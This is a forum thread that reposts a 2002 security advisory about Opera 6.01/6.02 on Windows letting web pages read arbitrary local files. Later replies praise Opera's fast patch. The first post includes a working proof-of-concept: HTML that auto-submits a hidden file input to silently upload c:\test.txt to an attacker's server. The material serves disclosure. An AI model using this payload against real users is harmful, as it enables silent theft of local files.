Opera: Reading ANY local file.
Results 1 to 6 of 6

Thread: Opera: Reading ANY local file.

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    742

    Opera: Reading ANY local file.

    Time to upgrade, again?

    GreyMagic Security Advisory GM#001-OP
    By GreyMagic Software, Israel.
    27 May 2002. Topic: Reading ANY local file in Opera.
    Discovery date: 07 May 2002.
    Affected applications:
    Opera 6.01 on Windows platforms.
    Opera 6.02 on Windows platforms.

    Exploit:
    This exploit will automatically transfer the file "c:/test.txt" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction:

    Code:
    <body onload="document.secForm.submit()">
    <form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
    <input type="file" name="expFile" value="c:\test.txt
    " style="visibility:hidden">
    </form>
    </body>
    Solution:
    Opera was informed on 15 May 2002 and confirmed our findings. A day later, in the evening of 16 May 2002, Opera informed us that the vulnerability was fixed and committed to Opera's own version control system. On 27 May 2002, Opera released version 6.03, which addressed this issue. Opera has been extremely responsive and quick to understand and patch this vulnerability. They have shown that they truly do take security seriously.

    The rest of the article can be found here.

  2. #2
    Senior Member
    Join Date
    Dec 2001
    Posts
    590
    Hehe...kool, thanks for this Micael. Less then two hours ago, I just downloaded Opera 6.02, cos I only found out today that they had released a new version. Now I'm downloading 6.03...



    But yeah, it's good that they have responded so quickly with an updated new version that takes care of the vulnerability. It's good to see.

    Greg
    \"Do you know what people are most afraid of?
    What they don\'t understand.
    When we don\'t understand, we turn to our assumptions.\"
    -- William Forrester

  3. #3
    Senior Member
    Join Date
    Dec 2001
    Posts
    304
    Damit...I was about to post this...Oh well,
    Yea it is nice to see that Opera does know that security is a must.
    I would like to see microsoft come out with a patch that works a day later.
    Violence breeds violence
    we need a world court
    not a republican with his hands covered in oil and military hardware lecturing us on world security!

  4. #4
    Senior Member
    Join Date
    Dec 2001
    Posts
    590
    I would like to see microsoft come out with a patch that works a day later.
    This would seriously be an impossible task. If they were to fix a bug in every release they made they day after they released it, we would have a NEVER ending cycle of releases.

    IE 6.01, IE 6.02, IE 6.03, ..., IE 6.0365 - that would be one year's worth.

    Greg
    \"Do you know what people are most afraid of?
    What they don\'t understand.
    When we don\'t understand, we turn to our assumptions.\"
    -- William Forrester

  5. #5
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    grr.. why can we just download a patch instead of the whole version?? its gettin annoying

  6. #6
    Old-Fogey:Addicts founder Terr's Avatar
    Join Date
    Aug 2001
    Location
    Seattle, WA
    Posts
    2,007
    True, an incremental patch would be nice. And although a bug was found that seems potentially serious, I think the fact that a new version exists so quickly is definitely good.
    [HvC]Terr: L33T Technical Proficiency

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides